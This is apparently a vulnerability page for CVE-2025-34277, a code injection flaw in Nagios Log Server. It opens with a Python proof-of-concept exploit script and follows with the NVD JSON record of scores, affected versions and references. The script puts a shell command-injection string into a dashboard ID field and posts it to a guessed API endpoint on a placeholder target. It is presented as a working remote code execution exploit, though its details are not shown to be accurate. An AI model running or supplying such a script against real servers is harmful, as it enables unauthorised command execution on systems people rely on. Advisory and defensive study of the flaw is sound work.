CVE-2025-34277

# CVE-2025-34277 Nagios Log Server RCE PoC # Target: Nagios Log Server < 2024R1.3.1 # Type: Code Injection via malformed dashboard ID import requests import json TARGET = "http://target-nagios-log-server.com" DASHBOARD_ID = "'; whoami > /tmp/pwned; #" def exploit_cve_2025_34277(): """ Exploit for CVE-2025-34277: Code injection via malformed dashboard ID The malicious dashboard ID is not validated before being forwarded to internal API """ headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-34277-PoC)' } # Craft malicious dashboard ID payload payload = { 'dashboard_id': DASHBOARD_ID, 'action': 'view', 'format': 'json' } # Send request to vulnerable endpoint endpoint = f"{TARGET}/api/dashboard/view" try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) print(f"[*] Sent malicious dashboard ID: {DASHBOARD_ID}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") # Check if exploit was successful if response.status_code == 200: print("[+] Payload delivered successfully") return True else: print("[-] Exploit may have failed") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-34277 Nagios Log Server RCE Exploit") print("=" * 50) exploit_cve_2025_34277()

{"cve": {"id": "CVE-2025-34277", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:48.227", "lastModified": "2025-11-06T16:27:31.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios Log Server versions prior to 2024R1.3.1 contain a code injection vulnerability where malformed dashboard ID values are not properly validated before being forwarded to an internal API. An attacker able to supply crafted dashboard ID values can cause the system to execute attacker-controlled data, leading to arbitrary code execution in the context of the Log Server process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "87E74637-713C-4DD7-B97E-2F247B7B12B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "B93D415C-B2C0-42CE-B9B3-29C29A3DCC16"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "997B64B5-A3F2-4D0E-B05E-CCA76D598C18"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "D20F6746-83DD-49AE-8C3D-AF2FFB47A89E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "5EF32AF5-19EA-495A-AB28-F78F33DDEC3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.2:*:*:*:*:*:*", "matchCriteriaId": "4C26DE7A-37AA-4570-81C1-2E0C1A9026F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:2024:r1.3:*:*:*:*:*:*", "matchCriteriaId": "52C22468-A773-49C8-81AD-9B76C26BFFD1"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/#log-server-2024R1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nagios.com/products/security/#log-server", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/nagios-log-server-rce-via-malformed-dashboard-id", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}